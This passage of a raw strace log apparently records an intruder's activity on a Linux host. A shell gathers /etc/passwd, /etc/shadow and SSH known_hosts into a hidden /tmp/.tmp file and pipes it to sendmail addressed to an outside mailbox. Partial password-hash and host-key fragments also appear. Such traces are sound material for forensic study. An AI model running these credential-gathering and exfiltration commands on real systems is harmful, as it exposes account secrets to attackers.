MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001e000 read(6, "Inter-| Receive "..., 1024) = 569 close(6) = 0 munmap(0x4001e000, 4096) = 0 ioctl(5, 0x8913, 0xbffff1e0) = 0 ioctl(5, 0x8927, 0xbffff1e0) = 0 ioctl(5, 0x891d, 0xbffff1e0) = 0 ioctl(5, 0x8921, 0xbffff1e0) = 0 ioctl(5, 0x8970, 0xbffff1e0) = 0 ioctl(5, 0x8970, 0xbffff1e0) = 0 ioctl(5, 0x8942, 0xbffff1e0) = 0 ioctl(5, 0x8915, 0xbffff1e0) = 0 ioctl(5, 0x8917, 0xbffff1e0) = 0 ioctl(5, 0x8919, 0xbffff1e0) = 0 ioctl(5, 0x891b, 0xbffff1e0) = 0 open("/proc/net/if_inet6", 
O_RDONLY) = -1 ENOENT (No such file or directory) open("/proc/net/dev", O_RDONLY) = 6 fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001e000 read(6, "Inter-| Receive "..., 1024) = 569 close(6) = 0 munmap(0x4001e000, 4096) = 0 ioctl(5, 0x8913, 0xbffff1e0) = 0 ioctl(5, 0x8927, 0xbffff1e0) = 0 ioctl(5, 0x891d, 0xbffff1e0) = 0 ioctl(5, 0x8921, 0xbffff1e0) = 0 ioctl(5, 0x8970, 0xbffff1e0) = 0 ioctl(5, 0x8970, 0xbffff1e0) = 0 ioctl(5, 0x8942, 0xbffff1e0) = 0 ioctl(5, 0x8915, 0xbffff1e0) = 0 ioctl(5, 0x8917, 0xbffff1e0) = 0 ioctl(5, 0x8919, 0xbffff1e0) = 0 ioctl(5, 0x891b, 0xbffff1e0) = 0 open("/proc/net/if_inet6", O_RDONLY) = -1 ENOENT (No such file or directory) close(5) = 0 write(1, "eth0 Link encap:Ethernet H"..., 1234) = 1234 munmap(0x4001d000, 4096) = 0 exit_group(0) = ?
--- SIGSTOP (Stopped (signal)) @ 0 (0) --- --- SIGSTOP (Stopped (signal)) @ 0 (0) --- getpid() = 1065 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0 open("/tmp/.tmp", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4 dup2(4, 1) = 1 close(4) = 0 execve("/bin/cat", ["cat", "/etc/passwd", "/etc/shadow", "/root/.ssh/known_hosts"], [/* 19 vars */]) = 0 uname({sys="Linux", node="f00f", ...}) = 0 brk(0) = 0x804c4a8 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000 open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0 old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000 close(4) = 0 open("/lib/tls/libc.so.6", O_RDONLY) = 4 read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512 fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0 old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000 old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000 old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000 close(4) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000 set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 munmap(0x40017000, 31716) = 0 brk(0) = 0x804c4a8 brk(0x804d4a8) = 0x804d4a8 brk(0) = 0x804d4a8 brk(0x804e000) = 0x804e000 
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0 mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000 close(4) = 0 fstat64(1, {st_mode=S_IFREG|0644, st_size=1234, ...}) = 0 open("/etc/passwd", O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=1391, ...}) = 0 read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1391 write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 1391) = 1391 read(4, "", 4096) = 0 close(4) = 0 open("/etc/shadow", O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0400, st_size=1047, ...}) = 0 read(4, "root:$1$n0xS10QY$U9Vb/IkGFHKgaxj"..., 4096) = 1047 write(1, "root:$1$n0xS10QY$U9Vb/IkGFHKgaxj"..., 1047) = 1047 read(4, "", 4096) = 0 close(4) = 0 open("/root/.ssh/known_hosts", O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=1541, ...}) = 0 read(4, "10.1.10.191 ssh-rsa [REDACTED KEY STUFF]"..., 4096) = 1541 write(1, "10.1.10.191 ssh-rsa [REDACTED KEY STUFF]"..., 1541) = 1541 read(4, "", 4096) = 0 close(4) = 0 close(1) = 0 exit_group(0) = ?
--- SIGSTOP (Stopped (signal)) @ 0 (0) --- --- SIGSTOP (Stopped (signal)) @ 0 (0) --- getpid() = 1066 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0 open("/tmp/.tmp", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4 dup2(4, 1) = 1 close(4) = 0 execve("/usr/bin/find", ["find", "/home", "-name", "known_hosts", "-exec", "cat", "{}"], [/* 19 vars */]) = 0 uname({sys="Linux", node="f00f", ...}) = 0 brk(0) = 0x8054414 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000 open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0 old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000 close(4) = 0 open("/lib/tls/libc.so.6", O_RDONLY) = 4 read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512 fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0 old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000 old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000 old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000 close(4) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000 set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 munmap(0x40017000, 31716) = 0 brk(0) = 0x8054414 brk(0x8055414) = 0x8055414 brk(0) = 0x8055414 brk(0x8056000) = 0x8056000 
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0 mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000 close(4) = 0 time(NULL) = 1063931038 open("/usr/share/locale/locale.alias", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=2601, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 read(4, "# Locale name alias data base.\n#"..., 4096) = 2601 read(4, "", 4096) = 0 close(4) = 0 munmap(0x40017000, 4096) = 0 open("/usr/share/locale/en_US.UTF-8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en_US.utf8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en_US/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en.UTF-8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en.utf8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory) write(2, "find: ", 6) = 6 write(2, "missing argument to `-exec\'", 27) = 27 write(2, "\n", 1) = 1 exit_group(1) = ?
--- SIGSTOP (Stopped (signal)) @ 0 (0) --- --- SIGSTOP (Stopped (signal)) @ 0 (0) --- getpid() = 1067 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0 close(4) = 0 dup2(5, 1) = 1 close(5) = 0 stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0 access("/bin/cat", X_OK) = 0 rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0 execve("/bin/cat", ["cat", "/tmp/.tmp"], [/* 19 vars */]) = 0 uname({sys="Linux", node="f00f", ...}) = 0 brk(0) = 0x804c4a8 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000 open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0 old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000 close(4) = 0 open("/lib/tls/libc.so.6", O_RDONLY) = 4 read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512 fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0 old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000 old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000 old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000 close(4) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000 set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 munmap(0x40017000, 31716) = 0 brk(0) = 0x804c4a8 brk(0x804d4a8) = 0x804d4a8 brk(0) = 0x804d4a8 brk(0x804e000) = 0x804e000 
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0 mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000 close(4) = 0 fstat64(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0 open("/tmp/.tmp", O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=5213, ...}) = 0 read(4, "eth0 Link encap:Ethernet H"..., 4096) = 4096 write(1, "eth0 Link encap:Ethernet H"..., 4096) = 4096 read(4, "28HbRLshEW8T3dU=\n10.1.10.174 ssh"..., 4096) = 1117 write(1, "28HbRLshEW8T3dU=\n10.1.10.174 ssh"..., 1117
--- SIGSTOP (Stopped (signal)) @ 0 (0) --- --- SIGSTOP (Stopped (signal)) @ 0 (0) --- getpid() = 1068 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0 dup2(4, 0) = 0 close(4) = 0 rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0 execve("/usr/sbin/sendmail", ["/usr/sbin/sendmail", "-f", "ownage@xxxxxx", "m0nkeyhack@xxxxxxxxxxxxx"], [/* 19 vars */]